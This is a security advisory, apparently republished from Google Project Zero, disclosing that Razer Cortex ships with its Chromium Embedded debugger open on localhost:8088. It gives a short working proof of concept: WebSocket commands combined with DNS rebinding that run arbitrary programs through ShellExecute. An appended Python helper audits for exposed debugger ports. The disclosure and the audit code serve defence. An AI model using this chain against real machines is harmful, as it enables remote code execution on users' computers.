Razer Cortex Debugger Remote Command Execution

2018.12.18
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

Razer "Cortex" has CEF debugger stub enabled by default allowing arbitrary remote command execution.

I was alerted on twitter that the software distributed by Razer for their gaming equipment might be unsafe, I downloaded the ones I could see online to take a look. I have only looked at "Cortex", apparently some kind of system optimizer (frankly, the claims it makes seem dubious).

Cortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds.

    $ curl -si localhost:8088/json/list
    HTTP/1.1 200 OK
    Content-Length:2094
    Content-Type:application/json; charset=UTF-8

    [ {
       "description": "",
       "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)",
       "id": "(A6E5587C41694A59DB4142D98362B4CA)",
       "title": "Razer Game Deals - The best game deals on the web",
       "type": "page",
       "url": "https://deals.razer.com/?From=cortex&Userid=...",
       "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)"
    } ]

That is obviously exploitable, but the mechanics are pretty tricky. Razer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method JSOutBrowser.open(), that is passed directly to ShellExecute(), so you can use it for command execution.

1. Read the list of pages using DNS rebinding from http://localhost:8088/json/list
2. Open a WebSocket to the webSocketDebuggerUrl listed.

Do something like:

    x = new WebSocket("ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)")
    x.send(JSON.stringify({"id":1,"method":"Runtime.enable"})) // Enable javascript evaluation
    x.send(JSON.stringify({"id":2,"method":"Runtime.evaluate","params":{"expression":"RazerCortexOutBrowser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))"}})) // Run arbitrary commands.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Found by: taviso
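For checking your own workstation for this class of exposure, the following is an added example (not part of the original report or Razer's code) that recognises a Chromium/CEF DevTools listing like the one returned by /json/list above and reports every target that offers a debugger WebSocket. The function names and the sample listing are constructed for illustration; port 8088 is the one shown in the report.

```python
"""Audit helper: recognise a Chromium/CEF DevTools listener by its /json/list reply."""
import http.client
import json
import urllib.request
from urllib.parse import urlparse

# Constructed sample, modelled on the /json/list reply shown in the report.
SAMPLE_BODY = json.dumps([{
    "id": "(CONSTRUCTED-TARGET-ID)",
    "title": "Example page",
    "type": "page",
    "url": "https://example.invalid/",
    "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(CONSTRUCTED-TARGET-ID)",
}])


def exposed_targets(body):
    """Return (title, page url, debugger url) for each attachable target in body.

    Anything that is not a JSON array of objects carrying a ws:// or wss://
    webSocketDebuggerUrl is treated as "not a DevTools listing" and yields [].
    """
    try:
        entries = json.loads(body)
    except (TypeError, ValueError):
        return []
    if not isinstance(entries, list):
        return []
    found = []
    for entry in entries:
        if not isinstance(entry, dict):
            continue
        ws = entry.get("webSocketDebuggerUrl")
        if isinstance(ws, str) and urlparse(ws).scheme in ("ws", "wss"):
            found.append((entry.get("title", ""), entry.get("url", ""), ws))
    return found


def audit_port(port, host="127.0.0.1", timeout=2.0):
    """Fetch /json/list from a local port; closed or unrelated services yield []."""
    try:
        with urllib.request.urlopen(f"http://{host}:{port}/json/list", timeout=timeout) as resp:
            return exposed_targets(resp.read().decode("utf-8", "replace"))
    except (OSError, ValueError, http.client.HTTPException):
        return []


if __name__ == "__main__":
    for title, url, ws in audit_port(8088):  # 8088 is the port shown in the report
        print(f"debugger exposed: {title!r} ({url}) -> {ws}")
```

A non-empty result means a local process accepts debugger connections on that port, which is the condition the report describes.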



Copyright 2024, cxsecurity.com

 
